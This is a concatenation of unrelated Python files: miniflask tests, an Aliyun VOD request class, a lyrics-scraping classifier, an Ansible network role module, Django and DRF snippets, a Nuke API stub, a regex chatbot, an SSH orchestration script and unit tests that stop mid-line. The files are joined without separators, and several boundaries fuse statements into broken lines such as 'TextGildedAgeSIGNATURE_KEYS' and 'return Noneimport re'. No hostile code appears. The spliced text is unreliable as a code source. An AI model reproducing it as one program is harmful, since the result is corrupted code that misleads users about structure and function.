captured = capsys.readouterr() mf.event.print_bool() captured = capsys.readouterr() assert captured.out == """ modules.module1.bool1: [False] modules.module1.bool2: [True] """.lstrip() def test_bool_tf(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--bool1=f", "--bool2=t", ]) captured = capsys.readouterr() mf.event.print_bool() captured = capsys.readouterr() assert captured.out == """ modules.module1.bool1: [False] modules.module1.bool2: [True] """.lstrip() def test_bool_truefalse(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--bool1=false", "--bool2=true", ]) captured = capsys.readouterr() mf.event.print_bool() captured = capsys.readouterr() assert captured.out == """ modules.module1.bool1: [False] modules.module1.bool2: [True] """.lstrip() from lltk.imports import * class TextGildedAge(Text): pass class GildedAge(Corpus): TEXT_CLASS = TextGildedAgeSIGNATURE_KEYS = ['signature', 'timestamp', 'nonce', 'echostr'] ENCRYPT_SIGNATURE_KEYS = ['signature', 'timestamp', 'nonce', 'msg_signature'] MSG_KEYS = ['ToUserName', 'FromUserName', 'MsgType', 'Content'] OTHER_MSG_TYPE = ['image', 'voice', 'video', 'shortvideo', 'location', 'link'] REPLY_STR = '''<xml> <ToUserName><![CDATA[%s]]></ToUserName> <FromUserName><![CDATA[%s]]></FromUserName> <CreateTime>%s</CreateTime> <MsgType><![CDATA[text]]></MsgType> <Content><![CDATA[%s]]></Content> </xml>''' def reply_template(fr, to, time, reply): return REPLY_STR % (fr, to, time, reply) # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. 
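# Hedged usage sketch (an illustrative assumption, not taken from the original
# module): request objects like the SubmitSnapshotJobRequest defined below are
# normally filled in via their setters and sent through an aliyunsdkcore
# AcsClient, roughly like:
#
#   from aliyunsdkcore.client import AcsClient
#   client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-shanghai')
#   request = SubmitSnapshotJobRequest()
#   request.set_VideoId('<video-id>')
#   request.set_Count(5)
#   request.set_Interval(10)
#   response = client.do_action_with_exception(request)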
from aliyunsdkcore.request import RpcRequest from aliyunsdkvod.endpoint import endpoint_data class SubmitSnapshotJobRequest(RpcRequest): def __init__(self): RpcRequest.__init__(self, 'vod', '2017-03-21', 'SubmitSnapshotJob','vod') if hasattr(self, "endpoint_map"): setattr(self, "endpoint_map", endpoint_data.getEndpointMap()) if hasattr(self, "endpoint_regional"): setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional()) def get_ResourceOwnerId(self): return self.get_query_params().get('ResourceOwnerId') def set_ResourceOwnerId(self,ResourceOwnerId): self.add_query_param('ResourceOwnerId',ResourceOwnerId) def get_UserData(self): return self.get_query_params().get('UserData') def set_UserData(self,UserData): self.add_query_param('UserData',UserData) def get_SpecifiedOffsetTime(self): return self.get_query_params().get('SpecifiedOffsetTime') def set_SpecifiedOffsetTime(self,SpecifiedOffsetTime): self.add_query_param('SpecifiedOffsetTime',SpecifiedOffsetTime) def get_SpriteSnapshotConfig(self): return self.get_query_params().get('SpriteSnapshotConfig') def set_SpriteSnapshotConfig(self,SpriteSnapshotConfig): self.add_query_param('SpriteSnapshotConfig',SpriteSnapshotConfig) def get_SnapshotTemplateId(self): return self.get_query_params().get('SnapshotTemplateId') def set_SnapshotTemplateId(self,SnapshotTemplateId): self.add_query_param('SnapshotTemplateId',SnapshotTemplateId) def get_Height(self): return self.get_query_params().get('Height') def set_Height(self,Height): self.add_query_param('Height',Height) def get_ResourceOwnerAccount(self): return self.get_query_params().get('ResourceOwnerAccount') def set_ResourceOwnerAccount(self,ResourceOwnerAccount): self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount) def get_Count(self): return self.get_query_params().get('Count') def set_Count(self,Count): self.add_query_param('Count',Count) def get_VideoId(self): return self.get_query_params().get('VideoId') def set_VideoId(self,VideoId): self.add_query_param('VideoId',VideoId) def get_OwnerId(self): return self.get_query_params().get('OwnerId') def set_OwnerId(self,OwnerId): self.add_query_param('OwnerId',OwnerId) def get_Width(self): return self.get_query_params().get('Width') def set_Width(self,Width): self.add_query_param('Width',Width) def get_FileUrl(self): return self.get_query_params().get('FileUrl') def set_FileUrl(self,FileUrl): self.add_query_param('FileUrl',FileUrl) def get_Interval(self): return self.get_query_params().get('Interval') def set_Interval(self,Interval): self.add_query_param('Interval',Interval)import threading _thread_locals = threading.local() def set_current_user(user): _thread_locals.user = user def get_current_user(): return getattr(_thread_locals, 'user', None) def remove_current_user(): _thread_locals.user = None#!/usr/bin/env python # coding: utf-8 # # Project: Lyrics Classifier # Workflow # 1- Get lyrics from the web # 2- Clean the list of songs (with spacy) # 3- Vectorize the clean list # 4- Transform the list # 5- Apply the model (NB, Logistic Regression, etc..) 
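# Illustrative sketch (not part of the original workflow above): a minimal,
# self-contained version of steps 3-5 on a tiny hard-coded corpus. The lyrics,
# artist labels and helper name below are assumptions for demonstration only;
# the real script builds the same CountVectorizer -> TfidfTransformer ->
# MultinomialNB pipeline from scraped and cleaned song texts further down.
def _demo_vectorize_and_classify():
    from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
    from sklearn.naive_bayes import MultinomialNB
    from sklearn.pipeline import make_pipeline

    # Tiny toy corpus: two "songs" with their artists as labels.
    toy_lyrics = ["hello darkness my old friend", "we will we will rock you"]
    toy_artists = ["Simon and Garfunkel", "Queen"]

    # Vectorize word counts, re-weight with tf-idf, then fit a Naive Bayes model.
    demo_pipeline = make_pipeline(CountVectorizer(), TfidfTransformer(), MultinomialNB())
    demo_pipeline.fit(toy_lyrics, toy_artists)

    # Words shared with the training corpus ("rock", "you") drive the prediction.
    return demo_pipeline.predict(["rock you all night long"])[0]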
import requests from bs4 import BeautifulSoup as soup import numpy as np import os import pandas as pd import spacy import sys from sklearn.feature_extraction.text import CountVectorizer from sklearn.feature_extraction.text import TfidfTransformer from sklearn.pipeline import make_pipeline from sklearn.naive_bayes import MultinomialNB from sklearn.model_selection import train_test_split # -------------------------------------------------------- # Class # ------------------------------------------------------- class Artist: def __init__(self, name): self.name = name self.newname = "" self.web = "" self.song = "" self.songtext = "" self.title = "" def get_links_artist(self): """ Find all the links for a given artist where songs can be found and store the links in a list """ page_list=[] # Adjust the name of the artist artist_name = self.name.lower() if artist_name.startswith("the"): artist_name = artist_name.replace('the','') artist_name = artist_name.replace(' ','-') artist_name = artist_name[1:] else: artist_name = artist_name.replace(' ','-') self.newname = artist_name # Look for the lyrics in metrolyrics.com link_str = 'https://www.metrolyrics.com/' + artist_name + '-lyrics.html' artist_request = requests.get(link_str) artist_soup = soup(artist_request.text,'html.parser') page_tag = artist_soup.find_all(attrs={"class":"pages"}) if len(page_tag) == 0: page_tag = artist_soup.find_all('a',attrs={"class":"active"}) page_list.append(page_tag[0].get('href')) else: for each in page_tag[0].find_all('a'): #print(each.get('href')) page_list.append(each.get('href')) file_name = "Songs/" + artist_name + "_link_pages.csv" np.savetxt(file_name, page_list,delimiter=",", fmt='%s') self.web = self.newname + "_link_pages.csv" return None def get_links_songs(self): page_list = [] for line in open("Songs/"+ self.web): csv_row = line.split() art = requests.get(csv_row[0]) art_soup = soup(art.text,'html.parser') song_tag = art_soup.find_all('tbody') for each in song_tag[0].find_all('a',attrs={"class":"title hasvidtable"}): page_list.append(each.get('href')) for each in song_tag[0].find_all('a',attrs={"class":"title"}): page_list.append(each.get('href')) file_name = "Songs/" + self.newname + "_link_songs.csv" np.savetxt(file_name, page_list,delimiter=",", fmt='%s') self.song = self.newname + "_link_songs.csv" return None def get_song_lyrics(self): """ Read the file with the song links, read the text of the song and save it in a list Save also a list with the titles of the songs """ song_list = [] title_list = [] for line in open("Songs/" + self.song ): csv_row = line.split() art = requests.get(csv_row[0]) art_soup = soup(art.text,'html.parser') song_tag = art_soup.find_all(attrs={"class":"lyrics-body"}) mySong = "" for each in song_tag[0].find_all('p',class_="verse"): mySong = mySong + " " + each.text.replace('\n', ' ') #Find the title myTitle = art_soup.find_all('h1') mySong.strip() if (mySong.find('instrumental') == -1): song_list.append(mySong) title_list.append(myTitle[0].text) #Save the song text in a file df = pd.DataFrame(data=song_list) file_name = "Songs/" + self.newname + "_songs_text.csv" df.to_csv(file_name, sep=',',index=False,header=None) #Save the song titles in a file df = pd.DataFrame(data=title_list) file_name = "Songs/" + self.newname + "_songs_title.csv" df.to_csv(file_name, sep=',',index=False,header=None) self.songtext = self.newname + "_songs_text.csv" self.title = self.newname + "_songs_title.csv" return None # --------------------------------------------------------------- # ## General 
functions # -------------------------------------------------------------- def create_Artist(artist_name): a = Artist(artist_name) a.get_links_artist() a.get_links_songs() a.get_song_lyrics() return a def clean_song_list(reg_list,model): """ Input a list of strings - in this case the songs - and return the clean list of songs """ clean_song_list = [] for string in reg_list: doc = model(string) clean_text = '' for word in doc: if not word.is_stop and word.lemma_ != '-PRON-' and word.pos_ != 'PUNCT': word = word.lemma_ clean_text += word + ' ' clean_song_list.append(clean_text) return clean_song_list def create_df_artist_song(art): """ Read the text of all songs saved in csv files and create a DataFrame with text song and titles """ file_name_text = "Songs/" + art.songtext df_text = pd.read_csv(file_name_text,names=["Text"]) file_name_title = "Songs/" + art.title df_title = pd.read_csv(file_name_title,names=["Title"]) #print(df_text.shape) #print(df_title.shape) df = pd.concat([df_title, df_text],axis=1) df.dropna(inplace=True) df['Artist'] = art.name #print(df.shape) return df def create(name,art_nr): artist = create_Artist(name) #print(artist.name) df = create_df_artist_song(artist) #print("create df artist song") file_name = "Songs/all_artists_songs.csv" if art_nr < 1: df.to_csv(file_name, sep=',',index=False) else: df_all = pd.read_csv(file_name,names=['Title','Text','Artist']) os.remove(file_name) df2 = pd.concat([df_all, df]) #Save again to csv df2.to_csv(file_name, sep=',',index=False,header=None) return # -------------------------- # __main__ # -------------------------- if __name__ =="__main__": all_artists = [] all_artists_df = pd.DataFrame() if os.path.exists("Songs/all_artists_songs.csv"): os.remove("Songs/all_artists_songs.csv") while True: data = input("Enter an artist: \n") if len(data)==0: #print("No more artists") break else: all_artists.append(data) check_text = input("Enter a text and I'll predict the artist: \n") print(".....\n") print("Program starts...") # convert input into a list list_check_text = [check_text] # Create all my artist print("Creating artists...") final_artist_list=[] for l in all_artists: try: create(l,all_artists.index(l)) final_artist_list.append(l) except Exception as e: print(f"Can't find songs from {l}") # Concatenate all artists df--> done in my function #df_all = pd.concat(final_artist_list) # Create a df with all songs of all artists df_all = pd.read_csv("Songs/all_artists_songs.csv",names=['Title','Text','Artist'],skiprows=1) df_all.set_index('Title',inplace=True) #Convert text lyrics column into list list_text = df_all['Text'].tolist() print("Cleaning song lyrics..") # Clean song lyrics model = spacy.load('en_core_web_md') new_clean=clean_song_list(list_text,model) # Create new df with title, clean text and artist number df_clean = pd.DataFrame(index=df_all.index) df_clean['Artist'] =df_all['Artist'] df_clean['Text'] = new_clean #art_fac = pd.factorize(df_all['Artist']) #df_clean['Artist_Cat']=art_fac[0] # ## The Tf-Idf Transformer pipeline = make_pipeline( CountVectorizer(), TfidfTransformer(), MultinomialNB() #alpha=0.0000001 --> unigeness of words super important ) #y = [a1.name] * df1.shape[0] + [a2.name] * df2.shape[0] y = df_clean['Artist'] X = np.array(df_clean['Text']) X_train, X_test, y_train, y_test = train_test_split(X,y,random_state=42) print("Fitting the model...") pipeline.fit(X_train,y_train) #print(f"My model score is: {pipeline.score(X_test,y_test).round(2)}") #pipeline.fit(X,y) print("Predicting artist...\n") result = 
pipeline.predict_proba(list_check_text) #print(result) print(f"The artist is: {final_artist_list[result.argmax()]}") <reponame>gvashchenkolineate/gvashchenkolineate_infra_trytravis #!/usr/bin/python # Copyright: (c) 2018, Pluribus Networks # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = """ --- module: pn_role author: "Pluribus Networks (@rajaspachipulusu17)" version_added: "2.8" short_description: CLI command to create/delete/modify role description: - This module can be used to create, delete and modify user roles. options: pn_cliswitch: description: - Target switch to run the CLI on. required: false type: str state: description: - State the action to perform. Use C(present) to create role and C(absent) to delete role and C(update) to modify role. required: true type: str choices: ['present', 'absent', 'update'] pn_scope: description: - local or fabric. required: false type: str choices: ['local', 'fabric'] pn_access: description: - type of access. required: false type: str choices: ['read-only', 'read-write'] pn_shell: description: - allow shell command. required: false type: bool pn_sudo: description: - allow sudo from shell. required: false type: bool pn_running_config: description: - display running configuration of switch. required: false type: bool pn_name: description: - role name. required: true type: str pn_delete_from_users: description: - delete from users. required: false type: bool """ EXAMPLES = """ - name: Role create pn_role: pn_cliswitch: 'sw01' state: 'present' pn_name: 'foo' pn_scope: 'local' pn_access: 'read-only' - name: Role delete pn_role: pn_cliswitch: 'sw01' state: 'absent' pn_name: 'foo' - name: Role modify pn_role: pn_cliswitch: 'sw01' state: 'update' pn_name: 'foo' pn_access: 'read-write' pn_sudo: true pn_shell: true """ RETURN = """ command: description: the CLI command run on the target node. returned: always type: str stdout: description: set of responses from the role command. returned: always type: list stderr: description: set of error responses from the role command. returned: on error type: list changed: description: indicates whether the CLI caused changes on the target. returned: always type: bool """ from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.network.netvisor.pn_nvos import pn_cli, run_cli, booleanArgs from ansible.module_utils.network.netvisor.netvisor import run_commands def check_cli(module, cli): """ This method checks for idempotency using the role-show command. If a role with given name exists, return True else False. 
:param module: The Ansible module to fetch input parameters :param cli: The CLI string """ role_name = module.params['pn_name'] cli += ' role-show format name no-show-headers' out = run_commands(module, cli)[1] if out: out = out.split() return True if role_name in out else False def main(): """ This section is for arguments parsing """ state_map = dict( present='role-create', absent='role-delete', update='role-modify' ) module = AnsibleModule( argument_spec=dict( pn_cliswitch=dict(required=False, type='str'), state=dict(required=True, type='str', choices=state_map.keys()), pn_scope=dict(required=False, type='str', choices=['local', 'fabric']), pn_access=dict(required=False, type='str', choices=['read-only', 'read-write']), pn_shell=dict(required=False, type='bool'), pn_sudo=dict(required=False, type='bool'), pn_running_config=dict(required=False, type='bool'), pn_name=dict(required=False, type='str'), pn_delete_from_users=dict(required=False, type='bool'), ), required_if=( ["state", "present", ["pn_name", "pn_scope"]], ["state", "absent", ["pn_name"]], ["state", "update", ["pn_name"]], ), ) # Accessing the arguments cliswitch = module.params['pn_cliswitch'] state = module.params['state'] scope = module.params['pn_scope'] access = module.params['pn_access'] shell = module.params['pn_shell'] sudo = module.params['pn_sudo'] running_config = module.params['pn_running_config'] name = module.params['pn_name'] delete_from_users = module.params['pn_delete_from_users'] command = state_map[state] # Building the CLI command string cli = pn_cli(module, cliswitch) ROLE_EXISTS = check_cli(module, cli) cli += ' %s name %s ' % (command, name) if shell is (False or '') and sudo is True: module.fail_json( failed=True, msg='sudo access requires shell access' ) if command == 'role-modify': if ROLE_EXISTS is False: module.fail_json( failed=True, msg='Role with name %s does not exist' % name ) if command == 'role-delete': if ROLE_EXISTS is False: module.exit_json( skipped=True, msg='Role with name %s does not exist' % name ) if command == 'role-create': if ROLE_EXISTS is True: module.exit_json( skipped=True, msg='Role with name %s already exists' % name ) if scope: cli += ' scope ' + scope if command != 'role-delete': if access: cli += ' access ' + access cli += booleanArgs(shell, 'shell', 'no-shell') cli += booleanArgs(sudo, 'sudo', 'no-sudo') cli += booleanArgs(running_config, 'running-config', 'no-running-config') if command == 'role-modify': if delete_from_users: cli += ' delete-from-users ' + delete_from_users run_cli(module, cli, state_map) if __name__ == '__main__': main() # Django from django.conf.urls import url from dashboardHealthProfessional.views import (HomeHealthProfessional, ChartData) urlpatterns = ( url(r'^health_professional/$', HomeHealthProfessional.as_view(), name='dashboard_hp'), url(r'^ajax/chart_data/$', ChartData.as_view(), name='chart_data') ) from prefect.environments.execution import ( Environment, DaskKubernetesEnvironment, FargateTaskEnvironment, KubernetesJobEnvironment, LocalEnvironment, RemoteEnvironment, RemoteDaskEnvironment, ) <filename>jobs/api/serializers.py from rest_framework import serializers from jobs.models import Job class JobListSerializer(serializers.ModelSerializer): class Meta: model = Job fields = [ "title", "slug", "description", "jobcategory", "job_url", "thumbnail", "publish", ] class JobDetailSerializer(serializers.ModelSerializer): class Meta: model = Job fields = "__all__" <filename>hw4/proofs/Exceptions.py class ParseException(Exception): def 
__init__(self, line, expected, got): self.line = line self.expected = expected self.got = got def __str__(self): return "Error at %d: expected %s, but got %s" % (self.line, self.expected, self.got) class LexException(Exception): def __init__(self, line, got): self.line = line self.got = got def __str__(self): return "Error at %d: invalid symbol %c" % (self.line, self.got) class SubException(Exception): def __init__(self, node): self.node = node def __str__(self): return "Error: sub not implemented for " + self.node class ProofException(Exception): def __init__(self, rule, expr, reason, proof): self.rule = rule self.expr = expr self.reason = reason self.proof = proof def print(self): self.proof.print_proof() print("Error: proof rule %s can't be applies to %s, because %s" % (self.rule, str(self.expr), self.reason)) <gh_stars>1-10 from numbers import Number from typing import * import nuke from . import * class Undo(object): """ Undo """ def __hash__(self, ): """ Return hash(self). """ return None def __new__(self,*args, **kwargs): """ Create and return a new object. See help(type) for accurate signature. """ return None def begin(self,*args, **kwargs): """ Begin a new user-visible group of undo actions. """ return None def name(self,*args, **kwargs): """ Name current undo set. """ return None def end(self,*args, **kwargs): """ Complete current undo set and add it to the undo list. """ return None def new(self,*args, **kwargs): """ Same as end();begin(). """ return None def cancel(self,*args, **kwargs): """ Undoes any actions recorded in the current set and throws it away. """ return None def undoSize(self,*args, **kwargs): """ Number of undo's that can be done. """ return None def redoSize(self,*args, **kwargs): """ Number of redo's that can be done. """ return None def undoTruncate(self,*args, **kwargs): """ Destroy any undo's greater or equal to n. """ return None def redoTruncate(self,*args, **kwargs): """ Destroy any redo's greater or equal to n. """ return None def undoDescribe(self,*args, **kwargs): """ Return short description of undo n. """ return None def redoDescribe(self,*args, **kwargs): """ Return short description of redo n. """ return None def undoDescribeFully(self,*args, **kwargs): """ Return long description of undo n. """ return None def redoDescribeFully(self,*args, **kwargs): """ Return long description of redo n. """ return None def undo(self,*args, **kwargs): """ Undoes 0'th undo. """ return None def redo(self,*args, **kwargs): """ Redoes 0'th redo. """ return None def disable(self,*args, **kwargs): """ Prevent recording undos until matching enable() """ return None def enable(self,*args, **kwargs): """ Undoes the previous disable() """ return None def disabled(self,*args, **kwargs): """ True if disable() has been called """ return None def __enter__(self,*args, **kwargs): """ """ return None def __exit__(self,*args, **kwargs): """ """ return None def __init__(self, *args, **kwargs): """ Initialize self. See help(type(self)) for accurate signature. """ return Noneimport re, csv, random from datetime import datetime CHATLOG = "chatLog.txt" # constant -> file name for chat log psychobable = [ [r'(W|w)hat time is it in (.*)\?', ["The current time in {location} is: {time}.", "In {location} it is {time}." ] ], [r'What time is it\?', ["The current time is: {time}.", "It is {time}." ] ], [r'(P|p)ut (an|a)\s?(.*) alarm(!|\.)', [ "Setting a {timer} alarm.", "Alarm set for {timer}." 
] ], [r'(S|s)et (an|a)\s?(.*) alarm(!|\.)', [ "Setting a {timer} alarm.", "Alarm set for {timer}." ] ], [r'(S|s)et an alarm for (.*)(!|\.)', [ "Alarm set for {timer}." ] ], [r'(C|c)an you give me the time in (.*)\?', [ "The time in {location} is {time}." ] ], [r'(A|a)ctivate a (.*)timer(\.|!)', [ "Timer activated." ] ], [r'(.*)', [ "Sorry I can't help you with that.", "There seems to be a issue with your request.", "Sorry I do not understand your request...", "I do not know what you are asking of me...", "I am unable to understand what you mean by that." ] ] ] class Eliza: def __init__(self): # initialization of class Eliza with empty lists self.initials = [] # list of greetings of the chatbot self.finals = [] # list of final words of the chatbot self.quits = [] # list of words to quit talking to the chatbot def load(self, filePath): # method load # parameters: self # filePath -> file containing initials, finals and quits with open(filePath) as file: for line in file: if not line.strip(): continue tag, content = [part.strip() for part in line.split(':')] if tag == 'initial': self.initials.append(content) elif tag == 'final': self.finals.append(content) elif tag == 'quit': self.quits.append(content) def randInitial(self): # return random initial return random.choice(self.initials) def randFinal(self): # return random final return random.choice(self.finals) def respond(self, text): # method by which Eliza responds # parameters: self, # text -> some input by user # retuns: output -> some response by Eliza based on psychobable output = None if text.lower() in self.quits: # to quit return output output = self.analyze(text) # analyze text and respond accordingly return output def analyze(self, statement): # method to analyze the user input # parameters: self, # statement -> user input # returns: responds -> based on psychobable for pattern, responses in psychobable: match = re.match(pattern, statement) # match user input with psychobable regex if match: response = random.choice(responses) # respond with one of the possible responses zone = 'Luxembourg' # zone default is Luxembourg alarm = '0 seconds' # alarm default is 0 seconds for g in match.groups(): if containsDigit(g): # determine if the user wants to set an alarm or know the time alarm = g else: zone = g return response.format(time=getLocalTime(zone), location=zone, timer=alarm) def run(self): # method to converse with the user # loop is broken with key quit words # method records conversation in a chatlog initial = self.randInitial() # start conversation with a greeting file = open(CHATLOG, 'w') file.write('Bot: \t' + initial) # Currently we override the file at each program execution file.close() print(initial) # print greeting on console while True: # wait for user reply sent = input('> ') logChat(CHATLOG,sent,'Human: ') output = self.respond(sent) # determine what to respond if output is None: break print(output) logChat(CHATLOG,output, 'Bot: ') final = self.randFinal() # Terminate the conversation with a goodbye print(final) logChat(CHATLOG,final, 'Bot: ') def containsDigit(string): # function to determine if a given string contains a number # returns true if string contains at least one digit else false for character in string: if character.isdigit(): return True return False def getLocalTime(zone): # function to get UTC-time and # add the timezone delta extracted of a given zone from a csv file to it. 
# returns local time for a given zone/city, # expressed in hours:minutes:seconds with open("timeZone.csv",'r',newline='\n') as csvfile: reader = csv.reader(csvfile) utcDelta = 0 # default delta utcTime = datetime.utcnow().time() # current UTC-time for row in reader: if zone == row[0]: # match first csv argument with given zone utcDelta = row[1] # extract delta from file return '{H}:{M}:{S}'.format(H = str((int(utcTime.hour) + int(utcDelta))%24).zfill(2), M = str(utcTime.minute).zfill(2), S = str(utcTime.second).zfill(2)) # add delta to UTC-time def logChat(filePath, line, actor): # method logChat # attributes: # filePath -> where to save the conversation, # line -> line to be saved, # actor -> defines which actor said line with open(filePath, 'a') as file: file.write('\n'+actor+'\t'+line) def main(): eliza = Eliza() # initialize the class with empty values eliza.load('initialsFinals.txt') # load initials, finals and quit keywords eliza.run() # run Eliza chatbot if __name__ == '__main__': main()#! /usr/bin/env python import argparse import concurrent.futures import logging import os import re import shutil import socket import subprocess import sys from pathlib import Path import yaml ENDPOINT_REGEX = re.compile(r"(\w+://)\d+\.\d+\.\d+\.\d+(:\d+)") SCRIPT_DIR = Path(__file__).resolve().parent logger = logging.getLogger(__name__) def check_output(*args, verbose=False, **kwargs): if "universal_newlines" not in kwargs: kwargs["universal_newlines"] = True if "check" not in kwargs: kwargs["check"] = True try: return subprocess.run(*args, **kwargs, stdout=subprocess.PIPE).stdout except subprocess.CalledProcessError as error: if verbose: raise else: logger.error(error) sys.exit(1) def get_users(path: Path): with open(path) as yaml_file: users = yaml.load(yaml_file, Loader=yaml.Loader) if not users: users = [] return users def _barnum(host, user=None, bailey_args=None, dry_run=False, bailey_cmd="bailey"): if user: logger.debug(f"Processing {user}@{host}") else: logger.debug(f"Processing {host}") if host != socket.gethostname(): cmd = ["ssh", "-x", "-o", "LogLevel=error", host, f"PATH={os.environ.get('VIRTUAL_ENV')}/bin:$PATH", bailey_cmd] else: cmd = [bailey_cmd] if user: cmd.append(user) if bailey_args is not None: cmd.extend(bailey_args) if dry_run: return f"DRY RUN; would execute: {' '.join(cmd)}" else: logger.debug(f"bailey cmd: {' '.join(cmd)}") return check_output(cmd, verbose="--verbose" in bailey_args) def barnum_multi_thread(hosts, bailey_args=None, dry_run=False, bailey_cmd="bailey"): with concurrent.futures.ThreadPoolExecutor(max_workers=len(hosts)) as executor: # Start threads; create dict of future: host if bailey_args is None: bailey_args = [] results = { executor.submit( _barnum, host, bailey_args=bailey_args, dry_run=dry_run, bailey_cmd=bailey_cmd, ): host for host in hosts } for future in concurrent.futures.as_completed(results): host = results[future] try: data = future.result() except Exception as exc: print(f"ERROR on {host}: {exc}") else: print(data) def barnum_single_thread(hosts, bailey_args=None, dry_run=False, bailey_cmd="bailey"): for host in hosts: print( _barnum( host, bailey_args=bailey_args, dry_run=dry_run, bailey_cmd=bailey_cmd, ) ) def main(): args = parse_args() if args.verbose: init_logging(logging.DEBUG) else: init_logging(logging.INFO) logger.debug(f"args: {args}") if args.config_path: config_path = args.config_path else: config_dir = Path( os.environ.get('APPDATA') or os.environ.get('XDG_CONFIG_HOME') or os.path.join(os.environ['HOME'], '.config'), ) / "barnum" 
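        # Illustrative note (an assumption, not from the original script): with
        # neither APPDATA nor XDG_CONFIG_HOME set, the expression above falls
        # back to "$HOME/.config", so config_dir becomes e.g.
        # /home/alice/.config/barnum, and barnum_config.yaml is created inside
        # it below if it does not exist yet.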
config_dir.mkdir(exist_ok=True, parents=True) config_path = config_dir / "barnum_config.yaml" if not config_path.exists(): with open(config_path, "w") as file: file.write("# Add usernames here:\n# - <username1>\n# - <username1>") logger.debug(f"Wrote config file template to {config_path}") if args.user_and_host: try: user, host = args.user_and_host.split("@") except ValueError: user, host = None, args.user_and_host output = _barnum( host=host, user=user, bailey_args=args.bailey_args, dry_run=args.dry_run, bailey_cmd=args.bailey_cmd, ) print("---") print(output) else: users = get_users(config_path) if not users: logger.error(f"You must provide at least one username in {config_path}") sys.exit(1) config_paths = get_user_circus_ini_paths(users) hosts = get_unique_systemd_hosts(config_paths) logger.debug(f"Circus is configured on the following hosts: {', '.join(hosts)}") if args.no_threads: barnum_single_thread( hosts, bailey_args=args.bailey_args, dry_run=args.dry_run, bailey_cmd=args.bailey_cmd, ) else: barnum_multi_thread( hosts, bailey_args=args.bailey_args, dry_run=args.dry_run, bailey_cmd=args.bailey_cmd, ) def get_unique_systemd_hosts(config_file_paths): return set(path.parent.name for path in config_file_paths) def get_user_circus_ini_paths(users): paths = [] for user in users: base = Path("/", "users", user, "circus").glob("*/circus.ini") paths.extend(base) return paths def init_logging(level): """Initialize logging.""" logging.getLogger().setLevel(level) _logger = logging.getLogger(__name__) console_handler = logging.StreamHandler() console_handler.setFormatter(logging.Formatter("barnum: %(message)s")) _logger.addHandler(console_handler) _logger.setLevel(level) class WideHelpFormatter(argparse.HelpFormatter): def __init__(self, *args, **kwargs): # If we can't determine terminal size, just let argparse derive it itself # in the super class width, __ = shutil.get_terminal_size(fallback=(None, None)) if width: kwargs["width"] = width super().__init__(*args, **kwargs) def _format_usage(self, usage, actions, groups, prefix): usage = super()._format_usage(usage, actions, groups, prefix) usage = f"{usage.strip()} [-- BAILEY_ARG [BAILEY_ARG ...] [-- CIRCUS_ARG [CIRCUS_ARG ...]]]" return usage def parse_args(): parser = argparse.ArgumentParser(formatter_class=WideHelpFormatter) parser.add_argument( "user_and_host", nargs="?", help="Can be EITHER user@host OR just host. In the former case, operations will " "affect only the circus instance for user@host. 
In the latter case, " "operations will affect ALL circus instances on host", ) parser.add_argument( "--config-path", type=Path ) parser.add_argument("--bailey-cmd", default="bailey") parser.add_argument( "-v", "--verbose", action="store_true", help="Increase verbosity" ) parser.add_argument( "-D", "--dry-run", action="store_true", help="Don't make any changes" ) parser.add_argument( "--no-threads", action="store_true", help="Don't use threads for SSH'ing" ) parser.add_argument( "-C", "--circus-cmd", help="Specify the positional argument to send to circus" ) parser.add_argument("--no-colors", action="store_true", help="No colors") # argparse doesn't seem to be able to handle this natively, so we manually # alter sys.argv before argparse sees it in order to pull out all of the # circus arguments try: index = sys.argv.index("--") sys.argv, bailey_args = sys.argv[:index], sys.argv[index + 1 :] except ValueError: bailey_args = [] parsed_args = parser.parse_args() if parsed_args.verbose: bailey_args = ["--verbose", *bailey_args] if not parsed_args.no_colors: bailey_args = ["--force-colors", *bailey_args] if parsed_args.circus_cmd: bailey_args = ["--circus-cmd", parsed_args.circus_cmd, *bailey_args] parsed_args.bailey_args = bailey_args return parsed_args if __name__ == "__main__": main() <filename>tests/test_sources.py import unittest import numpy as np import bioslds.sources as sources from bioslds.arma import make_random_arma class TestSourcesConstant(unittest.TestCase): def test_all_returned_values_are_equal_to_given_constant(self): x = 3.5 src = sources.Constant(x) y = src(size=15) np.testing.assert_allclose(y, x) def test_returns_requested_number_of_values(self): src = sources.Constant(0.5) n = 23 y = src(size=n) self.assertEqual(len(y), n) class TestSourcesConstantStrAndRepr(unittest.TestCase): def setUp(self): self.x = 3.2 self.src = sources.Constant(self.x) def test_str(self): s = str(self.src) s_exp = f"Constant({str(self.x)})" self.assertEqual(s, s_exp) def test_repr(self): r = repr(self.src) r_exp = f"Constant({repr(self.x)})" self.assertEqual(r, r_exp) class TestSourcesStreamBasic(unittest.TestCase): def test_empty_result_if_zero_samples_requested_from_empty_store(self): src = sources.Stream([]) y = src(size=0) self.assertEqual(len(y), 0) def test_reading_samples_from_empty_store_raises_index_error(self): src = sources.Stream([]) with self.assertRaises(IndexError): src(size=1) class TestSourcesStream(unittest.TestCase): def setUp(self): rng = np.random.default_rng(3) self.n = 100 self.data = rng.normal(size=self.n) self.src = sources.Stream(self.data) def test_empty_result_if_zero_samples_requested(self): y = self.src(size=0) self.assertEqual(len(y), 0) def test_returned_samples_match_data(self): y = self.src(size=self.n) np.testing.assert_allclose(y, self.data) def test_generate_n1_then_n2_returns_first_n1_plus_n2(self): n1 = self.n // 3 n2 = self.n // 2 y1 = self.src(size=n1) y2 = self.src(size=n2) y = 